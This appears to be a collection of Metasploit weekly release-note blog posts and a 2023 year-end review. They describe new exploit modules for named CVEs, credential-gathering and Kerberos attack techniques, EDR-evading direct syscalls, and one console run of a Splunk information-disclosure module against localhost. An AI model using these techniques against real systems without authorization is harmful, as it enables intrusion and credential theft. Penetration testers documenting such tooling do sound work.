The main difficulty is to find the correct syscall number since it is not the same across Windows versions. Also, EDR’s usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used for this is based on the assumption that the syscall numbers are assigned in a sequential order, starting from the number 0. If we look at how native API functions are stored in memory, the syscall number can be deduced from the position of the related native API function in memory. The technique consists in selecting the system call functions (Zw…) from ntdll.dll exports and sorting them in ascending order of their memory addresses. The syscall number of one given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo’s Gate.

Another improvement is to make sure the call to the syscall instruction is made through ntdll.dll. EDR/AV can monitor this and flag any system calls not coming from ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation will take care of parsing ntdll.dll and get the correct trampoline address that will be used when the system call is executed.

This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using Direct Syscalls. The long-term goal is to make Direct Syscalls a standard for any future Windows-based development (payload, exploit, etc.).

New module content (8)

GL.iNet Unauthenticated Remote Command Execution via the logread module.

Authors: DZONERZY, Unknown, and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18648 contributed by h00die-gr3y
Path: linux/http/glinet_unauth_rce_cve_2023_50445

Description: This PR adds an exploit module for a number of different GL.iNet network products. The module combines an authentication by-pass vulnerability (CVE-2023-50919) with an RCE (CVE-2023-50445) allowing the user to remotely obtain, without authentication, a Meterpreter session running in the context of the root user.

Ivanti Connect Secure Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18708 contributed by sfewer-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2023_46805

Description: This PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.

MajorDoMo Command Injection

Authors: Valentin Lobstein and smcintyre-r7
Type: Exploit
Pull request: #18630 contributed by Chocapikk
Path: linux/http/majordomo_cmd_inject_cve_2023_50917

Description: This adds an exploit for a command injection vulnerability in MajorDoMo versions before 0662e5e.

Saltstack Minion Payload Deployer

Authors: c2Vlcgo and h00die
Type: Exploit
Pull request: #18626 contributed by h00die
Path: linux/local/saltstack_salt_minion_deployer

Description: This PR adds an exploit module which allows for a user who has compromised a host acting as a SaltStack Master to deploy payloads to the Minions attached to that Master.

Apache Commons Text RCE

Authors: Alvaro Muñoz, Gaurav Jain, and Karthik UJ
Type: Exploit
Pull request: #18638 contributed by errorxyz
Path: multi/http/apache_commons_text4shell

Description: Adds an exploit module for CVE-2022-42889 that targets web apps utilizing Apache Commons Text’s (1.5-1.9) StringSubstitutor interpolator class in an insecure fashion.

Atlassian Confluence SSTI Injection

Authors: Harsh Jaiswal, Rahul Maini, and Spencer McIntyre
Type: Exploit
Pull request: #18734 contributed by zeroSteiner
Path: multi/http/atlassian_confluence_rce_cve_2023_22527

Description: This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account.

PRTG CVE-2023-32781 Authenticated RCE

Author: Kevin Joensen [email protected]
Type: Exploit
Pull request: #18568 contributed by ggisz
Path: windows/http/prtg_authenticated_rce_cve_2023_32781

Description: This PR adds a module leveraging CVE-2023-32781, an authenticated command injection vulnerability in PRTG versions 23.2.84.1566 and earlier. The result is command execution as SYSTEM.

Memory Search

Author: sjanusz-r7
Type: Post
Pull request: #18713 contributed by sjanusz-r7
Path: multi/gather/memory_search

Description: Adds a new multi/gather/memory_search module that can read memory of processes on Windows and Linux hosts with Meterpreter. Regular expressions can be used to find passwords/credentials, and glob patterns and PIDs can be used to identify target processes.

Enhancements and features (6)

  • #17634 from adfoster-r7 – Reliability and stability notes that have been previously missing have been added to some modules.
  • #18645 from jvoisin – This adds a way to get the Build ID from ld.so by using the ‘perf’ command. Before this module depended on the commands ‘file’ and ‘readelf’ being installed to get the Build ID.
  • #18663 from sjanusz-r7 – Adds a new Postgres session type, which is current behind a feature flag that can be activated with: features set postgresql_session_type true. Example usage: use scanner/postgres/postgres_login followed by run postgres://postgres:[email protected]:9000/template1 createsession=true verbose=false.
  • #18720 from zeroSteiner – This enhancement marks the existing Unix encoders as also being compatible with Linux. Previously, no encoder modules were marked as compatible with Linux, so users could not set bad character when using the new fetch payloads.
  • #18735 from AleksaZatezalo – Adds additional module metadata to the exploits/windows/iis/iis_webdav_scstoragepathfromurl module.
  • #18737 from zeroSteiner – This updates metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows. See this PR and this PR for details.

Bugs fixed (3)

  • #18662 from dwelch-r7 – Fixes an edgecase where features set dns_feature true did not correctly parse a user’s /etc/resolv.conf file if there were multiple nameservers present.
  • #18712 from ekalinichev-r7 – Fixes a crash with Metasploit’s REST api when calling /api/v1/modules?name=aux.
  • #18746 from zeroSteiner – Fixes a module bug when using the generate OPTION=VALUE syntax. Previously, the module’s datastore would be unintentionally updated with the new option value.

Documentation added (1)

  • #18729 from poupapaa – This fixes a typo in Metasploit-Guide-SMB.md.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 01/19/24

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2024/01/19/metasploit-weekly-wrap-up-01-19-24/

Unicode your way to a php payload and three modules to add to your playbook for Ansible

Metasploit Weekly Wrap-Up 01/19/24

Our own jheysel-r7 added an exploit leveraging the fascinating tool of php filter chaining to prepend a payload using encoding conversion characters and h00die et. al. have come through and added 3 new Ansible post modules to gather configuration information, read files, and deploy payloads. While none offer instantaneous answers across the universe, they will certainly help in red team exercises.

New module content (4)

Ansible Agent Payload Deployer (1 of 3 Ansible post modules)

Authors: h00die and n0tty
Type: Exploit
Pull request: #18627 contributed by h00die
Path: linux/local/ansible_node_deployer

Ansible Config Gather (2 of 3 Ansible post modules)

Author: h00die
Type: Post
Pull request: #18627 contributed by h00die
Path: linux/gather/ansible

Ansible Playbook Error Message File Reader (3 of 3 Ansible post modules)

Authors: h00die and rioasmara
Type: Post
Pull request: #18627 contributed by h00die
Path: linux/gather/ansible_playbook_error_message_file_reader

Description: This adds 3 post-exploitation modules for Ansible. The first one gathers information and configuration. The second exploits an arbitrary file read that enables an attacker to read the first line of a file (typically /etc/shadow), when the compromised account is configured with password-less sudo permissions. The last one is an exploit that can deploy a payload to all the nodes in the network.

WordPress Backup Migration Plugin PHP Filter Chain RCE

Authors: Nex Team, Valentin Lobstein, and jheysel-r7
Type: Exploit
Pull request: #18633 contributed by jheysel-r7
Path: multi/http/wp_backup_migration_php_filter

Description: This adds an exploit module that leverages an unauthenticated RCE in the WordPress plugin Backup Migration versions prior to 1.3.7. This vulnerability is identified as CVE-2023-6553. This also adds a library that implements a technique called PHP Filter Chaining which allows an attacker to prepend bytes to a string by continuously chaining character encoding conversion.

Enhancements and features (2)

  • #18596 from dwelch-r7 – Updates multiple SMB modules to work with the new upcoming SMB session type support. This beta functionality is currently behind a feature flag, and can be enabled with features set smb_session_type true.
  • #18682 from adfoster-r7 – Add tests for Msf::Exploit::Local module types to ensure that sysinfo will not break again in the future.

Bugs fixed (2)

  • #18655 from adfoster-r7 – Ensures the module will automatically be used when the hierarchical search functionality is enabled and only one module result is found.
  • #18710 from adfoster-r7 – Fixes an uninitialized constant Msf::Simple::Exploit::ExploitDriver exception that could sometimes occur when running Metasploit framework’s payload modules.

Documentation added (1)

  • #18702 from Sh3llSp4wn – Updates the documentation for the private and public fields in lib/metasploit/framework/credential.rb to be correct.

You can always find more documentation on our docsite at docs.metasploit.com.

Missing rn-* label on Github (1)

PLEASE ADD RN-TAGS TO THESE PULL REQUESTS BEFORE RELEASING THE WRAP UP, AND RERUN THE WRAPUP SCRIPT

  • #18398 from errorxyz – Fixes deprecation warnings when running the auxiliary/admin/scada/modicon_password_recovery, auxiliary/scanner/lotus/lotus_domino_hashes, auxiliary/sniffer/psnuffle, exploits/unix/webapp/vbulletin_vote_sqli_exec exploit modules with a database connected.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 01/12/24

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2024/01/12/metasploit-weekly-wrap-up-01-12-24/

New module content (1)

Windows Gather Mikrotik Winbox "Keep Password" Credentials Extractor

Metasploit Weekly Wrap-Up 01/12/24

Author: Pasquale ‘sid’ Fiorillo
Type: Post
Pull request: #18604 contributed by siddolo
Path: windows/gather/credentials/winbox_settings

Description: This pull request introduces a new post module to extract the Mikrotik Winbox credentials, which are saved in the settings.cfg.viw file when the "Keep Password" option is selected in Winbox.

Enhancements and features (7)

  • #18515 from errorxyz – This PR adds a Java target for the ManageEngine ServiceDesk Plus exploit CVE-2022-47966 using the payload mentioned in this blogpost and deletes the log file that records the error due to the exploit to make it more stealthy.
  • #18672 from h00die – Fix spelling mistakes in Metasploit’s library folder.
  • #18673 from h00die – Fix spelling mistakes in Metasploit’s scripts folder.
  • #18674 from h00die – Fix spelling mistakes in Metasploit’s plugins folder.
  • #18675 from h00die – Fix spelling mistakes in Metasploit’s tools folder.
  • #18679 from h00die – Fix spelling mistakes in Metasploit’s auxiliary modules.
  • #18691 from zeroSteiner – Metasploit console now requires an installed version of apktool greater than or equal to v2.9.2.

Bugs fixed (5)

  • #18656 from dwelch-r7 – Enforces all modules to be loaded as part of reload_all when the defer_module_loads feature is enabled.
  • #18666 from zeroSteiner – Fixes a crash when running the save command to save Metasploit’s configuration.
  • #18667 from zeroSteiner – Re-adds the #sysinfo instance method for sessions.
  • #18669 from sjanusz-r7 – Updates the favorites command to no longer output an empty message when a chosen module does not have custom datastore values available.
  • #18690 from sjanusz-r7 – Ensures that a target’s default payload is correctly chosen when selecting a module from the search command.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up 1/05/2024

Post Syndicated from Jacquie Harris original https://blog.rapid7.com/2024/01/05/metasploit-weekly-wrap-up-40/

New module content (2)

Splunk __raw Server Info Disclosure

Metasploit Weekly Wrap-Up 1/05/2024

Authors: KOF2002, h00die, and n00bhaxor
Type: Auxiliary
Pull request: #18635 contributed by n00bhaxor
Path: gather/splunk_raw_server_info

Description: This PR adds a module for an authenticated Splunk information disclosure vulnerability. This module gathers information about the host machine and the Splunk install including OS version, build, CPU arch, Splunk license keys, etc.

[msf](Jobs:0 Agents:0) > use auxiliary/gather/splunk_raw_server_info 
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set username admin
username => admin
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set password splunksplunk
password => splunksplunk
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > set verbose true
verbose => true
[msf](Jobs:0 Agents:0) auxiliary(gather/splunk_raw_server_info) > run
[*] Running module against 127.0.0.1
[+] Output saved to /root/.msf4/loot/20231220204049_default_127.0.0.1_splunk.system.st_943292.json
[+] Hostname: 523a845e8652
[+] CPU Architecture: x86_64
[+] Operating System: Linux
[+] OS Build: #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09)
[+] OS Version: 6.5.0-kali3-amd64
[+] Splunk Version: 7.1.0
[+] Trial Version?: false
[+] Splunk Forwarder?: false
[+] Splunk Product Type: splunk
[+] License State: OK
[+] License Key(s): ["FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"]
[+] Splunk Server Roles: ["indexer", "license_master"]
[+] Splunk Server Startup Time: 2023-12-21 01:40:02
[*] Auxiliary module execution completed

Craft CMS unauthenticated Remote Code Execution (RCE)

Authors: Thanh, chybeta, and h00die-gr3y [email protected]
Type: Exploit
Pull request: #18612 contributed by h00die-gr3y
Path: linux/http/craftcms_unauth_rce_cve_2023_41892

Description: This adds an exploit module that leverages a remote code execution vulnerability in CraftCMS versions between 4.0.0-RC1 and 4.4.14. This vulnerability is identified as CVE-2023-41892 and allows an unauthenticated attacker to execute arbitrary code remotely.

Enhancements and features (2)

  • #18610 from sjanusz-r7 – This PR enables the Metasploit Payload Warnings feature by default. When enabled Metasploit will output warnings about missing Metasploit payloads, for instance if they were removed by antivirus.
  • #18632 from jvoisin – This PR adds improvements to the Glibc Tunables Privilege Escalation module. In the event the file command is not present on the target the module will try to use the readelf command to get the ld.so build ID and determine whether or not the target is compatible with the exploit.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit 2023 Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2023/12/29/metasploit-2023-wrap-up/

Metasploit 2023 Wrap-Up

As 2023 winds down, we’re taking another look back at all the changes and improvements to the Metasploit Framework. This year marked the 20th anniversary since Metasploit version 1.0 was committed and the project is still actively maintained and improved thanks to a thriving community.

Version 6.3

Early this year in January, Metasploit version 6.3 was released with a number of improvements for targeting Active Directory environments. The crowning achievement of this effort was the integration of native Kerberos authentication. With this in place, HTTP, LDAP, MSSQL, SMB and WinRM modules can all make use of Kerberos authentication, enabling a swath of new attack techniques and workflows. In addition to the existing modules that are now capable of authenticating with Kerberos, multiple Kerberos-specific modules were added as well for a variety of tasks such as requesting tickets from the Key Distribution Center (aka the KDC which is almost always the Active Directory Domain Controller), forging tickets from known secrets, and inspecting the contents of tickets.

This functionality was highlighted in Black Hat USA’s Arsenal demonstrations, a recording of which can be found online.

Fetch Based Payloads

In May 2023, Metasploit released a new set of payloads, dubbed the Fetch Payloads which make exploitation of OS-command-executing vulnerabilities easier for users. At the time of the release, about two-thirds of exploits added to the Metasploit Framework in the previous year resulted in the execution of an OS command, either due to direct injection or via some other means such as deserialization. While OS command execution is becoming more popular, it often limits the type of payloads that can easily be added to an exploit since the most advanced payloads, including Meterpreter, aren’t available as OS commands.

Prior to the Fetch Payloads, exploit authors were burdened with the work necessary to convert Meterpreter payloads to something deliverable as an OS command. This led to extra work and inconsistent implementations that often lacked the flexibility our users desire. The new pattern uses the Fetch Payloads, which allows the Framework to handle this automatically. The result is less work for exploit developers and a higher degree of control for end users. We expect to see Fetch Payloads continue to be used widely well past 2024 and to have new variants added.

Even More Kerberos Improvements

While the Metasploit 6.3 release provided support for native Kerberos authentication for Metasploit, we’ve since built on it to add even more. These features didn’t make it into the original 6.3 release in January but have since shipped in weekly releases:

  • The auxiliary/admin/kerberos/forge_ticket module was expanded to support the diamond and sapphire techniques in addition to the original golden and silver techniques.
  • The auxiliary/admin/kerberos/forge_ticket module was also updated to account for the additional fields used by Windows Server 2022, enabling its compatibility with the latest Windows targets.
  • We added the post/windows/manage/kerberos_tickets post module, which enables users to dump Kerberos tickets from a compromised host. This is similar functionality to what the popular Rubeus tool’s klist/dump commands do and operates entirely in memory. With this in place, users can now exploit instances of Unconstrained Delegation.
  • The auxiliary/gather/windows_secrets_dump module was updated to support pass-the-ticket authentication when using the DCSync technique (the DOMAIN action). This enables users to dump all of the secrets from the target given only a valid Kerberos ticket with the required permissions instead of requiring authentication by username and password.

Fewer DNS Leaks

One of the best features of Metasploit is the seamless way in which users can use established Meterpreter and SSH sessions to tunnel traffic as configured by the route command or often the post/multi/manage/autoroute module. Until this year, these connections would resolve hostnames to IP addresses from the system on which the Metasploit Framework was running, which could potentially leak information to listening parties. Thanks to a combined effort by sempervictus and smashery, Metasploit can now be configured to use a custom DNS server that is optionally accessed via an established session. This feature is currently behind a feature flag and requires users to run features set dns_feature true before it can be accessed.

Once enabled, the dns command allows users to configure how they would like to resolve DNS hostnames. Users can simply specify a single server to handle all queries, or use a wildcard syntax to send DNS queries for one domain to a specific server and non-matching queries to another. The weekly wrap up for the original release contains more detailed notes and usage examples.

Discoverability Improvements

A more recent change to the Framework brought a new feature to allow searching for more fields within modules. By enabling hierarchical search with features set hierarchical_search_table true, users will now find search queries that match module actions, targets, and AKA aliases. For example, this will cause the auxiliary/admin/kerberos/forge_ticket module to be included in the search results when forge_golden is the query because forging golden tickets is one of the actions that it supports.

Users can also discover new capabilities and how to use them by browsing our new docs site at docs.metasploit.com. This site’s source code is included within Metasploit itself, making it easy for users to contribute improvements and their own workflows.

Payload Improvements

Exploits are at the core of what we do on the Metasploit team, but they would be nothing without our payloads. This year saw multiple improvements to our payloads — some changes closed feature gaps, while others added net new functionality. Some highlights include:

  • Smashery updated our Java Meterpreter payloads with an important fix to the loader to enable compatibility with the latest versions of OpenJDK.
  • Salu90 added a new API to the Windows Meterpreter and a post module to use it that allows users to set the session’s token to a new value.
  • JustAnda7 updated the Windows Meterpreter to display IPv6 routes for inspection when the user runs the Meterpreter route command (not to be confused with the Framework route command).
  • Ishaanahuja7 added support to Meterpreter for running natively on Apple’s new ARM-based chips.
  • Sempervictus added native sessions for AWS Instance connections and AWS SSM agents. These session types are noteworthy because while they require access tokens, they do not require a payload to be run on the target and can be used to open a session on a target that Metasploit is otherwise unable to communicate with.
  • usiegl00 and Ishaanahuja7 both contributed enhancements to add support OSX AArch64 Meterpreter payloads, which enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

Additionally, GitHub Actions are now being used to measure the feature coverage of the Meterpreter API commands. It’s a lesser-known fact that the Meterpreter payload has multiple implementations for different architectures and platforms. This means some features may be present in one and not another. This is the reason the Mimikatz kiwi plugin isn’t available when the java/meterpreter/reverse_tcp payload is used. To help us and the community track this information, a report including a coverage matrix is now generated automatically. This report can be accessed by navigating to the project’s Actions tab, selecting “Acceptance”, the latest run, and finally downloading the “final-report”.

Module Highlights

  • CVE-2022-47966 – This particular vulnerability was an RCE in multiple ManageEngine products. A combined effort by cdelafuente-r7 and h00die-grey brought exploits for the ServiceDesk Plus, ADSelfService Plus, and Endpoint Central products.

  • CVE-2023-34362 (Exploit) – The MOVEit exploit leverages one of the more high-profile vulnerabilities to have been released this year. This module exploits a SQL injection to leak sensitive data in order to upload a .NET deserialization payload which results in code execution in the context of NT AUTHORITY\ SYSTEM and was a combined effort by sfewer-r7, rbowes-r7, and bwatters-r7.

  • CVE-2023-32560 (Exploit) – This vulnerability is an unauthenticated RCE in Ivanti Avalanche MDM that would result in code execution as NT AUTHORITY\SYSTEM. The module was submitted by EgeBalci and is one of the very few memory corruption exploits added this year.

  • CVE-2023-46214 (Exploit) – Chocapikk made their first contributions this year, one of which is for an authenticated RCE in Splunk Enterprise.

  • CVE-2023-22952
    (Exploit) – This exploit was contributed by community member h00die-gr3y back in January of 2023. While it may seem like old news nearly a year later, this zero-day gained a lot of attention when it first came to light. This exploit brought along with it new mixin capabilities for Metasploit to embed PHP payloads in PNG images. This opens the door for future exploit modules to drop payloads inside of PNGs with ease.

  • CVE-2023-20887
    (Exploit) – This module was added by community contributor sinsinology (with help from community contributor h00die). There were a few Metasploit modules released this year that targeted VMware products; however this one stands out above the rest. Targeting the popular VMware Aria Operations for Networks software, this module enabled attackers to gain unauthenticated code execution in the context of the root user on a wide range of affected software versions.

  • CVE-2023-27350
    (Exploit) – Speaking of modules written for celebrity vulnerabilities, let’s not leave out the PaperCut NG Authentication Bypass, brought to the framework by Metasploit’s one and only Christophe De La Fuente. Christophe’s contribution helped pen testers better assess the security of systems hosting PaperCut NG and ease the concerns of their clients during a stressful time in the cybersecurity ecosystem. The module exploits all affected versions of PaperCut NG and returns an elevated Meterpreter session.

  • Post Module – Written by Spencer McIntyre of the Metasploit team, this module highlights the framework’s new, powerful Kerberos capabilities. Bringing along with it a large amount of railgun enhancements this module allows for Kerberos tickets to be exported from a compromised host and added to Metasploit’s own cache, allowing them to be used in subsequent attacks. The Kerberos work along with this module helps streamline many different types of attacks that can be performed in and around Domain environments. If you haven’t tested Metasploit’s Kerberos authentication capabilities yet, put it at the top of your todo list for 2024!

  • CVE-2023-28252
    (Exploit) – The Common Log File System (CLFS) driver is a fantastic vector for attacks; it’s installed on all the latest versions of Windows and saw more abuse in 2023. Ransomware gangs exploited this vulnerability to gain SYSTEM level access on Windows 10, 11 and Server 2022. Metasploit team member Jack Heysel wrote this module that uses the Reflective DLL template in order to drop a low level PoC which returns a session running in the context of NT AUTHORITY\SYSTEM.

  • CVE-2023-40044
    (Exploit) – Another exploit that made big waves this year was the WS_FTP server running the Ad Hoc Transfer module .NET deserialization vulnerability. The module and the initial research behind how the vulnerability actually works was brought to us by Metasploit’s very own, veteran contributor, Stephen Fewer. The exploit module runs reliably on a wide range of affected targets. Everyone loves a module where all you have to do is: select the module, input the IP address of the machine running the vulnerable software, run the module, and get a SYSTEM-level session.

Contributors

We would like to give a big thank you to all of the contributors who sent us code in 2023. Whether it was bug fixes, enhancements, or exploits, we appreciate the work you put into making Metasploit better. In 2023, we received pull requests from the following 75 people (ordered by count). Of these, 49 made their first contribution to Metasploit this year.

  • h00die
  • bcoles
  • smashery
  • h00die-gr3y
  • jmartin-tech
  • ErikWynter
  • EgeBalci
  • ismaildawoodjee (new in 2023)
  • wvu
  • jvoisin
  • sempervictus
  • rorymckinley (new in 2023)
  • rad10
  • manishkumarr1017 (new in 2023)
  • Ryuuuuu (new in 2023)
  • prabhatjoshi321 (new in 2023)
  • Chocapikk (new in 2023)
  • Jemmy1228 (new in 2023)
  • AleksaZatezalo (new in 2023)
  • emirpolatt (new in 2023)
  • heyder
  • steve-embling
  • dm-ct (new in 2023)
  • ide0x90
  • archcloudlabs
  • samsepi0x0 (new in 2023)
  • Lorenyx (new in 2023)
  • MikeAnast (new in 2023)
  • loredous (new in 2023)
  • bradyjackson (new in 2023)
  • nfsec
  • HynekPetrak
  • whotwagner (new in 2023)
  • rtpt-erikgeiser
  • errorxyz (new in 2023)
  • e-lliot (new in 2023)
  • gcarmix (new in 2023)
  • j0ev (new in 2023)
  • xaitax (new in 2023)
  • cudalac (new in 2023)
  • bka-dev
  • cnnrshd (new in 2023)
  • pbarry25 (new in 2023)
  • D00Movenok (new in 2023)
  • gardnerapp (new in 2023)
  • rodnt (new in 2023)
  • hahwul (new in 2023)
  • JustAnda7
  • Guilhem7 (new in 2023)
  • shellchocolat (new in 2023)
  • sdcampbell (new in 2023)
  • attl4s (new in 2023)
  • distortedsignal (new in 2023)
  • spmedia (new in 2023)
  • YiDa858 (new in 2023)
  • j-baines (new in 2023)
  • catatonicprime
  • vtoutain (new in 2023)
  • SubcomandanteMeowcos (new in 2023)
  • samueloph (new in 2023)
  • araout42 (new in 2023)
  • Pflegusch (new in 2023)
  • tekwizz123
  • rohitkumarankam (new in 2023)
  • jeffmcjunkin
  • MegaManSec
  • bugch3ck
  • raboof (new in 2023)
  • JBince (new in 2023)
  • Frycos (new in 2023)
  • neterum (new in 2023)
  • mkonda (new in 2023)
  • serializingme (new in 2023)
  • k0pak4
  • npm-cesium137-io
  • hamax97 (new in 2023)

Metasploit Weekly Wrap-Up

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2023/12/22/metasploit-weekly-wrap-up-39/

Getting Looney with Privilege Escalation

Metasploit Weekly Wrap-Up

As if Metasploit couldn’t get any loonier, this release adds a brand new exploit module for Glibc Tunables Privilege Escalation aka Looney Tunables. Now, using linux/local/glibc_tunables_priv_esc, you can check your target’s glibc version to see if it’s vulnerable to buffer overflow, as outlined in CVE-2023-4911. If so, the module will drop a python script and escalate your privilege to the root user, allowing you to execute malicious code. Happy Tuning!

New module content (3)

Vinchin Backup and Recovery Command Injection

Authors: Gregory Boddin (LeakIX) and Valentin Lobstein
Type: Exploit
Pull request: #18542 contributed by Chocapikk
Path: linux/http/vinchin_backup_recovery_cmd_inject

Description: This adds an exploit module for a command injection vulnerability in Vinchin Backup & Recovery versions v5.0, v6.0, v6.7, and v7.0. This leverages two vulnerabilities identified as CVE-2023-45499 and CVE-2023-45498.

Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)

Authors: Qualys Threat Research Unit, blasty [email protected], and jheysel-r7
Type: Exploit
Pull request: #18541 contributed by jheysel-r7
Path: linux/local/glibc_tunables_priv_esc

Description: This adds an exploit module for the "Looney Tunables" Linux LPE, identified as CVE-2023-4911. It checks the version of glibc running on the target to make sure it is vulnerable and, once verified, it drops a python script that exploits the vulnerability and returns a session running in the context of the root user.

Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)

Authors: jheysel-r7
Type: Exploit
Pull request: #18566 contributed by jheysel-r7
Path: multi/http/atlassian_confluence_unauth_backup

Description:
This adds an exploit module for CVE-2023-22518, an Improper Authorization vulnerability in Confluence which allows an attacker to upload and restore a .zip backup file to the server containing a known user name and password. The attacker can then login with the credentials from the backup file to gain administrative access to the server.

Enhancements and features (2)

  • #18622 from zeroSteiner – Updates the auxiliary/scanner/dcerpc/petitpotam module to work with newer Windows Server releases.
  • #18623 from gardnerapp – This updates the file handling of the generate command’s -o parameter to expand file system paths.

Bugs fixed (1)

Documentation added (1)

  • #18477 from AleksaZatezalo – This adds documentation for the auxiliary/scanner/nessus/nessus_rest_login module.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit Weekly Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2023/12/15/metasploit-weekly-wrap-up-38/

Continuing the 12th Labor of Metasploit

Metasploit Weekly Wrap-Up

Metasploit continues its Herculean task of increasing our toolset to tame Kerberos by adding support for AS_REP Roasting, which allows retrieving the password hashes of users who have Do not require Kerberos preauthentication set on the domain controller. The setting is disabled by default, but it is enabled in some environments.

Attackers can request the hash for any user with that option enabled, and worse (or better?) you can query the DC to determine which accounts have this setting, so not only can you get these hashes, the DC will tell you which users are vulnerable to the attack. Metasploit’s AS_REP roasting module will both gather the users and pull the authentication information, or pull information on a select set of users.

Ticket Management

This week’s release includes a brand new post module for enumerating and dumping Kerberos tickets from a compromised Windows host. This module will copy all of the tickets that are accessible based on the current privilege level to Metasploit’s own cache, where they can then be used in a Pass-The-Ticket (PTT) style attack. This notably enables Metasploit users to execute the entire workflow necessary to exploit Unconstrained Delegation right from with Metasploit, there’s even new documentation which outlines the entire process.

New module content (3)

Find Users Without Pre-Auth Required (ASREP-roast)

Author: smashery
Type: Auxiliary
Pull request: #18569 contributed by smashery
Path: gather/asrep

Description: This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two mechanisms, brute forcing using a list of usernames or using a LDAP query to request the relevant usernames, followed by requesting TGTs.

Splunk Authenticated XSLT Upload RCE

Authors: Valentin Lobstein, h00die, and nathan
Type: Exploit
Pull request: #18577 contributed by Chocapikk
Path: unix/http/splunk_xslt_authenticated_rce

Description: This PR adds a Remote Code Execution (RCE) module for Splunk Enterprise using CVE-2023-46214. This module exploits a vulnerability in the XSLT transformation functionality of certain versions of Splunk Enterprise, allowing for authenticated remote code execution.

Kerberos Ticket Management

Authors: Spencer McIntyre and Will Schroeder
Type: Post
Pull request: #18488 contributed by zeroSteiner
Path: windows/manage/kerberos_tickets

Description: This PR adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit’s own cache, allowing them to be used for the duration in which they are valid.

Enhancements and features (3)

  • #18539 from dwelch-r7 – This adds a new session type for SMB sessions. The smb session is behind a feature flag and can be enabled by setting features set smb_session_type true in msfconsole.
  • #18598 from bwatters-r7 – :
    This bumps the Metasploit-payload version to bring in one fix and one enhancement. The fix is to standardize the behavior of Java Meterpreter to only listen on IPv4 interfaces when binding to 0.0.0.0. The enhancement is to better align pretty OS names on Windows for Windows Kernel 10 releases, AKA Windows server 2016-present or Windows 10/11+.
  • #18601 from MikeAnast – Adds arm64 support to Metasploit’s Dockerfile. This new image is available from Dockerhub via docker pull metasploitframework/metasploit-framework:6.3.47 or through the wrapper script ./docker/bin/msfconsole.

Bugs fixed (4)

  • #18606 from Lorenyxrpc_plugin has been updated to correctly use the provided plugin options.
  • #18609 from adfoster-r7 – This fixes an issue in the cmd/windows/powershell/download_exec payload module that was preventing it from executing correctly due to an architecture check.
  • #18613 from dwelch-r7 – Ensures that after listing files within an SMB directory that the handle is closed.
  • #18614 from sjanusz-r7 – Fixes a crash in the auxiliary/scanner/ssh/ssh_identify_pubkeys module, as well as adding new module documentation.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

